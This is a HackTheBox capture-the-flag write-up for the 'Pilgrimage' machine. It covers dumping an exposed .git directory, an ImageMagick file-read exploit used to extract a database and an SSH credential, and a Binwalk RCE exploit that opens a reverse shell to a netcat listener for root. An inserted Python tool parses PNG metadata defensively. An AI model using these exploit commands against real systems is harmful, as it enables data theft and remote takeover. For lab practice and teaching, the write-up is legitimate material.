HackTheBox : Pilgrimage
Intro : It is an easy machine on the HackTheBox platform, from Hacker’s Clash Season II. Here we will exploit some CVEs and use some basic Linux skills; the box is essentially CVE-based. So let’s start our journey.
Nmap Scan :
As usual we start with a basic port scan using Nmap. I found 2 ports open: 22 (SSH) and 80 (HTTP), as is usual in a CTF.
I also added ‘pilgrimage.htb’ along with the IP to my hosts file, and I started a ‘Nikto’ scan to look for vulnerabilities.
Web Enumeration :
Then I visited the website to explore. It is a simple website to ‘shrink’ images, and there is nothing interesting there, not even in the source code. I also signed up and logged in, but that part is not vulnerable either.
I uploaded an image and it gave me a link to view the image.
Web Exploitation :
Then I started a simple ‘GoBuster’ scan with a common wordlist, and it told me that a ‘.git’ directory is present. The other results are not too interesting.
So I thought we could dump that whole directory with the ‘GitDumper’ tool. So I downloaded that tool from here.
Then I used that Python script to dump the ‘.git’ directory. It takes about 1 minute to dump everything.
After dumping I found all the website files along with an executable file called ‘magic’. That means we can run that file.
I saw that an ‘sqlite’ database file is referenced in ‘dashboard.php’. But we cannot read it, as we don’t have any shell. How fun!
Get User Shell As Emily :
Then I tried running that executable and found that the version of that tool is exploitable.
Version 7.1.0–49 is vulnerable, and I found exploit code in a GitHub repo here.
I downloaded that repo to my machine.
Then I ran that exploit. Before that you have to install the Python module ‘pypng’. Then you can run the exploit.
Basically the exploit helps us read system files like ‘/etc/passwd’, so we can also read that database file using this script. It saves the exploit in image format; we have to upload that to the web page and a link will be generated. After downloading the linked image we can decode it with that ‘magic’ tool.
Tip : pip3 install pypng
Tip : python3 generate.py -f "/var/db/pilgrimage" -o exploit.png
Then I uploaded that exploit.png file to the website and downloaded the linked image to my machine.
I downloaded the above link with the ‘wget’ command and got the image.
Then I ran that magic tool on that png file.
Tip : ./magic identify -verbose <your_image_name>
There is a long blob of hex-encoded data. I will not show the whole output because it is too long.
I used ‘CyberChef’ to decode that data and saved it to a file. I named the file with a ‘<name>.sqlite’ extension.
Then I cat’d that file and got a username and password, with no space between them.
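As an added example (my own code, not from the original writeup or the exploit repo), here is a small Python inspector that parses the PNG’s chunks directly, verifying each CRC, and looks at the text metadata from both sides: it flags an uploaded image whose text keyword is `profile` (in the vulnerable ImageMagick build that keyword’s value is taken as a path to read), and it hex-decodes a `Raw profile type` chunk in an output image, which is the step done above with CyberChef. The layout of that text (a blank line, profile name, byte count, then hex lines) and the 1x1 sample PNG builder used as test input are assumptions.

```python
import struct, zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"

def chunk(ctype, payload):  # encode one chunk: length, type, payload, CRC over type+payload
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def png_chunks(data):  # yield (type, payload) per chunk, checking the signature and every CRC
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype.decode("latin-1"), payload
        pos += 12 + length

def text_chunks(data):  # (keyword, text) pairs from tEXt/zTXt chunks; iTXt left out for brevity
    pairs = []
    for ctype, payload in png_chunks(data):
        if ctype in ("tEXt", "zTXt"):
            key, _, rest = payload.partition(b"\x00")
            # zTXt carries a 1-byte compression method followed by a deflate stream
            text = zlib.decompress(rest[1:]) if ctype == "zTXt" else rest
            pairs.append((key.decode("latin-1"), text.decode("latin-1")))
    return pairs

def decode_raw_profile(text):
    # assumed ImageMagick layout of 'Raw profile type ...' text: blank line, name, byte count, hex lines
    lines = [ln.strip() for ln in text.split("\n") if ln.strip()]
    return bytes.fromhex("".join(lines[2:]))

def inspect_png(data):
    """Flag a 'profile' keyword on an uploaded image; decode raw-profile payloads on an output image."""
    findings = []
    for key, text in text_chunks(data):
        if key.lower() == "profile":
            findings.append(("profile-keyword", text))
        elif key.startswith("Raw profile type"):
            findings.append(("raw-profile-bytes", decode_raw_profile(text)))
    return findings

def sample_png(keyword, text):  # constructed 1x1 grayscale PNG with one tEXt chunk (test input only)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    body = chunk(b"IHDR", ihdr) + chunk(b"tEXt", keyword + b"\x00" + text)
    return PNG_SIG + body + chunk(b"IDAT", zlib.compress(b"\x00\x00")) + chunk(b"IEND", b"")
```

Run `inspect_png(open("shrunk.png", "rb").read())` on a downloaded image to see what it carries; a CRC mismatch raises instead of silently accepting a tampered chunk.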
Tip : e***y : ab************23
Then I used SSH to log in, and I was in as Emily. Bingo!!!!!
And we got our ‘User_Flag’.
Privilege Escalation :
So it’s time for some PrivEsc to get root.
So I downloaded ‘pspy64’ to the victim’s machine and ran it.
I noticed there are many processes, but I found something interesting: there is a process running ‘malwarescan.sh’.
So I visited that folder and cat’d that file.
So it is using ‘Binwalk’ and doing something in ‘/var/www/pilgrimage.htb/shrunk’. So let’s look at that binwalk binary.
After typing the binwalk command it shows us the version and its usage.
I checked the version on Google and it is exploitable (RCE).
So I copied and saved that Python exploit in the ‘/dev/shm’ folder.
As the exploit takes a ‘png’ file as an argument, I made a ‘png’ format exploit with the previous ‘ImageMagick’ tool.
Tip : python3 generate.py -f "" -o <anyname>.png
Then I served that to the victim’s machine with my Python server.
Tip : python3 exploit.py test1.png <tun0_ip> <listened_port>
It says to rename the binwalk_exploit and start your netcat listener.
Then I renamed the exploit and saved it in ‘/var/www/pilgrimage.htb/shrunk’, as mentioned in the process.
You can change the name to whatever you like.
After some time I got a response in my Netcat listener.
I typed ‘whoami’ and we are now root. Wooooo!!!!!!! Double Bingo!!!
In this way I pwned the machine. Hope you learned something new here.
THANKS FOR READING!!
Happy Hacking~